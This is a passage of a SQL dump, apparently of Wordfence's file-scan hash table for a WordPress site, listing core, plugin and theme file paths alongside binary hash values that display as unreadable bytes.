���g\0�����a�B','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�KI\'Q��H}M�F��','wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js',0,'��_�vQ8_�$�?��','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('�PC<��	���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�)	~����ܖݟr','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�%?b�����~\0','o~!��A3V�x|�t�;�\'�3�-�I�\n�','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\na�g/�H��2*�e','n�R��Z�,�7G\'���fͺi߶�	�+!c��','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙ���~��M♸�','IoT�]��j�J��~�ď�7bn!M|��!F��','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZS-�.��G|J\"5','�Q�A.V�i��#\r�RJ���i.7�@B��d�','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�Nics�I�I','wp-includes/wp-includes/PHPMailer/PHPMailer.php',0,'�in=��2�����:G','�in=��2�����:G','����r����p�NX����7�����?H�RG��','',0,'?'),('�)Sl�W)�l�h�J\'.','wp-content/plugins/wp-cerber/assets/flags/me.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{H`C��~���^8�X','��&�P�-urk�P�����\"~aZ��ޢ�','',0,'?'),('�/�q�7-!�to�쿋','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',0,'�y$�NX���l��l','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('�2�>�[{�Lj�0�s�','wp-content/plugins/wp-cerber/assets/flags/ai.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�]��à�a�{��','*[3#�h���\"M�@]l�Ή05>И��ۖf','',0,'?'),('�4��g�G�aGo��]','wp-content/themes/sg-window/inc/css/sidebar-widget.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��@w��Dg�t}_','��ܔZ\0�҂������5�>0��z�-;�Fa�u','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"x�;���h�O���','��I}l�|U�j�Pr���7��ڲkV���`��','',0,'?'),('�?L�� ƹɷހi','wp-includes/wp-includes/customize/class-wp-customize-image-control.php',0,'j�f��	˥�^�К','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yk|��v���','*�x)��68NHɎ3 �AhC�	\'q~a� I<�','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�Ry��i��N�Z�','wp-includes/wp-includes/js/dist/vendor/react.min.js',0,'�jB���e�}����\"\Z','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('�V�����#�L�ؙA','wp-includes/wp-includes/js/dist/primitives.min.js',0,'�>�1��~�i!�EKHK/','�>�1��~�i!�EKHK/','�S�R�8P���oa:@c���E~�|�Ji�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�v�\0���������','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',0,'�q͊����tF����','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�w�\Z��plUz�Q�','wp-content/plugins/wp-cerber/assets/flags/ly.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�,ʁ���]��r�V','t��\n�jM��l��0�^��f&���`ʃ','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O 	�.�����.��>��CEj��','',0,'?'),('����z���ĎBF�S_','wp-includes/wp-includes/css/dist/nux/style-rtl.css',0,'�ip����8\0p���','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��FK�0��\0]0','?����l�̚U�^���t1\0#U|Yh�|�\"\Z','',0,'?'),('����92R]�X~�i�','wp-content/plugins/wp-cerber/assets/flags/bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��g��:�؀uO�c','�{h�s`�W�\\�v���n�OF�\Z�r���J�s','',0,'?'),('���9a��\\]�;��[�','wp-includes/wp-includes/Requests/Exception.php',0,'�����\0��3�\Z�RI','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('��|������V��\n','wp-includes/wp-includes/blocks/verse/block.json',0,'��h�h>��K3���u1','��h�h>��K3���u1','��ߋ�!�;n�^�u|ا�$Y0�56��4�','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i�	b�4l~�e�F��mj�','',0,'?'),('��`�Ǜ�qܱ8�I','wp-includes/wp-includes/blocks/button/block.json',0,'\\��]��u���H(','\\��]��u���H(','A$\Z�\Z�d��1�����/�ހ[�7�G','',0,'?'),('��O­\n	�U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;F4�A�I���T�','v��C���	a�\'F�;���z���(eJ��L','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�M��l~%������','\\�%k�����;�,׾����ay\\�s�A\'','',0,'?'),('�=��m��c���','wp-includes/wp-includes/class-wp-customize-widgets.php',0,'��,���^Oި�����','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qT������b�W�[}','�P\'���)�Y&T��j���A�- \"��2~','',0,'?'),('�!s\'M�.0����','wp-content/themes/sg-window/img/222.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+/~�;+��^jr\0�\0','�B��Mi;��\\s:`z��!/IR7�9=w�Ȩ�','',0,'?'),('�<t@�zfj����r�h','wp-content/plugins/wp-cerber/assets/flags/ht.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wѭ�b;��t�','#{�՞p�.3��T���[�Kj�P�x�=','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('�n���>EP�@	;�k�','wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php',0,'M��`f��\0�iu�','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gx�Fy1w��׻','�s7�-<%���WȒߚC�.��.	��zW','',0,'?'),('�|�l�ӌ��x���o','wp-content/themes/sg-window/inc/widget-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��\\��K\Z���[','Hݱ��o,�>\'��g	��!�u�(�<�C��nF�','',0,'?'),('�\rrƹϘ菳�����','wp-includes/wp-includes/js/jquery/ui/spinner.min.js',0,'0�������<8z�+','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('���E��(Ϊ=����','wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php',0,'Vj��B���ر���q','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� �b����d�]F�i�POZq��','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�[x�N�:���dw#\\','�R�/Q�O�l��@���c�0�\0a`n�o��<','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\0��V�r�K���','��=�)g��E�S�Y�[p�t%�Q���\"�','',0,'?'),('����\0��+؆����','wp-includes/wp-includes/class-wp-ajax-response.php',0,'o6�)�Q�\"Sσt�.H�','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h�	o�\\`��Y��','',0,'?'),('�ɔ/�	yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('��\rA�s@�Kx?0p','wp-includes/wp-includes/SimplePie/Source.php',0,'a��A:�$]B-�vw�)','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����’�?�@s�ó','aqq�������@.�7T�o=6�\0<��CZ','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('����L���j2�­','wp-includes/wp-includes/js/dist/notices.js',0,'m����5��F2�c�:į','m����5��F2�c�:į','�d��P��\'���Z8������ϭd�%9���AN','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('��x��Ϡ��\Z�P�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',0,'�w��ͱ��r0��؅=�','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('�˦�����]�ɬ��','wp-includes/wp-includes/js/dist/vendor/lodash.min.js',0,'�:)DnBC���9��','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('���cΧ�?5���}w�','wp-includes/wp-includes/js/codemirror/codemirror.min.js',0,'��	�f��h�;f�q�','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('�2��(c�?z➀�b','wp-content/themes/sg-window/inc/css/button.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.�q�gS����','�N����p4�}��O�oL��O��','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)���8 <�67�#\Z�','��]>y-�f�\"�Ny%\r�l��r`������','',0,'?'),('�U�~\n�SM:�r�� �D','wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php',0,'�\\������:R/�+','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('�g��\ZʻИJ��m{','wp-includes/wp-includes/ID3/getid3.php',0,'�!N\0�[�5�իk@0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('�j���\\�غ��&','wp-includes/wp-includes/class-wp-query.php',0,'\'\'\'��UQ�|4��','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�qOF����G�P*�','wp-includes/wp-includes/js/jquery/ui/effect-slide.js',0,'��a�d��{2װ�','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T%��dx�P7��/�','����{���]�[mX1!u������n�2f�','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]5�g��-M���','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��MGypQ�M/g�!�','wp-includes/wp-includes/js/jquery/ui/sortable.js',0,'�kX���E�EL�&�','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('��켮Aq=��l,����','wp-content/themes/sg-window/css/scheme-2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�Y�\\yD�>�g�','ac5j����}�@5��2�l�r+��\n��#','',0,'?'),('���\n(q���?�}v','wp-includes/wp-includes/feed-rss2-comments.php',0,'L��6<�v�z�L','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('��ӑ�?���=�','wp-includes/block-patterns/heading-paragraph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('��>�7��\n�a��wc','wp-includes/wp-includes/blocks/list/block.json',0,'��y��b�엽+����','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.�	�ח','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-�	�o�=��8,;h�\'LFR#�ʜB','',0,'?'),('���ZNߨ�@��U','wp-includes/wp-includes/certificates/ca-bundle.crt',0,'����M��T�[чB��','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�T���H�<&Jv�eӤ','wp-includes/wp-includes/feed-rdf.php',0,'xG�7�%���\0b���','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5قaܨϘ�	#��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��ez�Ua4�U�0#','M\0�Xʠ�m	!k����N0Q���YHF���Sda','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v	��~�%W\Z���','',0,'?'),('�K�J\n�\"�ڻ�<a','wp-includes/wp-includes/blocks/social-link.php',0,'0,}J\"��N������','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('�se������(d*G�}','wp-includes/wp-includes/functions.php',0,'�.���$[L�$�۫�','�.���$[L�$�۫�','sF���z ��v�j���*�	Q��w�0�ov','',0,'?'),('�z�s��w�K����S�','wp-includes/wp-includes/feed-rss2.php',0,'��lN+�5	��O?','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ	8P','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۶8��BZ�y��-',']�~*%6�r�+�q�.a�V�s!���Ysk����','',0,'?'),('���<�	�f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';b�`u����h\'���y','��Z�C��#�9�8H����<��h�,d��2','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('���ꌰ;�A��؀D','wp-includes/wp-includes/js/customize-preview-widgets.js',0,'y�}�����x��c�&�','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�|\\&��A�2�','�s��13���������.ˈ��i','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('��-��\n;�<�)�\Z','wp-includes/wp-includes/js/plupload/moxie.js',0,'�#C\r��5DZ�ǒ����','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('���`����Gl�йE','wp-includes/wp-includes/js/jquery/ui/effect-fade.js',0,'�rs�J��7O,��','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��r�`3�U�$�n��','���B:���BA��xd]��Y�<#�p��8u','',0,'?'),('�/�����3�J�','wp-includes/wp-includes/js/wp-auth-check.min.js',0,'*�L�A��`�2ڴ�Hd','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iŮ�9�e`��2�','Z���M�GXL;$xMi|Q�%���ŽY2��$_','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�Y��/<��k�@H�U','wp-includes/wp-includes/css/dist/block-editor/style.css',0,'�Ţ%	\Z�@1<��L��','�Ţ%	\Z�@1<��L��','Z]��5�㮊���c-N�|Wr��*#�H�U=E','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�q���?�)v�^MV�','wp-includes/wp-includes/js/media-models.js',0,'�wɊ��Ur���c[2','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('����^[X��i�	�','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���-G;:y^\Z)�','����F�ȳ۬�2U����-��:�1��','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�{����` .�','����=FL�e���c���^&��\Z|\nl��aO�','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a؂�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�zTc�I��J��W3','�zU)��i��YQ�;�PXꘞL�v�������','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('�	